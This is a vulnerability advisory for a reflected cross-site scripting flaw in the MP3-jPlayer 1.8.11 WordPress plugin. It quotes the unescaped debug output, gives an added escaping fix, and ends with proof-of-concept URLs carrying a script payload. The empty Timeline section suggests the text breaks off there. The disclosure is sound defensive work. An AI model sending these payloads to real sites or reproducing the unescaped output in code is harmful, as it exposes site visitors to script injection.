MP3-jPlayer 1.8.11 Reflected XSS

Homepage:

https://wordpress.org/plugins/mp3-jplayer/

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

$_GET['mp3'] is concatenated into the HTML output without being escaped.

File: mp3-jplayer\download.php

echo $js_pagetext;
$info = "<p>
	Get: " . $_GET['mp3'] . "<br />
	Sent: " . $sent . "<br />
	File: " . $file . "<br />
	Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />
	Root: " . $rooturl . "<br />
	pID: " . $playerID . "<br />
	Dbug: " . $dbug . "<br /></p>";

The same issue exists in:

File: mp3-jplayer\remote\downloader.php
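
A hardened form of the debug output shown above, as an added example that is not the plugin's own code or the vendor's fix: every value is passed through htmlspecialchars() before it is placed in the HTML. The helper names dbg() and build_debug_info() and all sample values are assumptions; only the field labels come from the download.php snippet.

```php
<?php
// Added example, not plugin code. dbg() and build_debug_info() are
// hypothetical helpers; the field labels mirror the advisory's snippet.

/** Escape one value for an HTML text or attribute context. */
function dbg($value): string
{
    // ?mp3[]=x makes $_GET['mp3'] an array; treat non-scalars as empty
    // instead of casting them (which would emit "Array" plus a warning).
    $text = is_scalar($value) ? (string) $value : '';
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the debug paragraph with every interpolated value escaped. */
function build_debug_info(array $fields): string
{
    $rows = [];
    foreach ($fields as $label => $value) {
        $rows[] = "\t" . dbg($label) . ': ' . dbg($value) . '<br />';
    }
    return "<p>\n" . implode("\n", $rows) . "</p>\n";
}

// Constructed sample input: the same payload shape as the proof of concept,
// standing in for $_GET['mp3'] so the script runs from the command line.
$mp3 = '<script>alert("XSS");</script>';

// All other values are constructed placeholders. They are escaped too,
// because several of them are derived from the request.
echo build_debug_info([
    'Get'  => $mp3,
    'Sent' => 'sample.mp3',
    'File' => 'sample.mp3',
    'Open' => '/var/www/html/sample.mp3',
    'Root' => 'http://wordpress-install',
    'pID'  => '0',
    'Dbug' => 'false',
]);
```

The same escaping applies to the equivalent output in remote\downloader.php.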

Proof of Concept:

http://wordpress-install/wp-content/plugins/mp3-jplayer/download.php?mp3=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

or

http://wordpress-install/wp-content/plugins/mp3-jplayer/remote/downloader.php?mp3=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Timeline: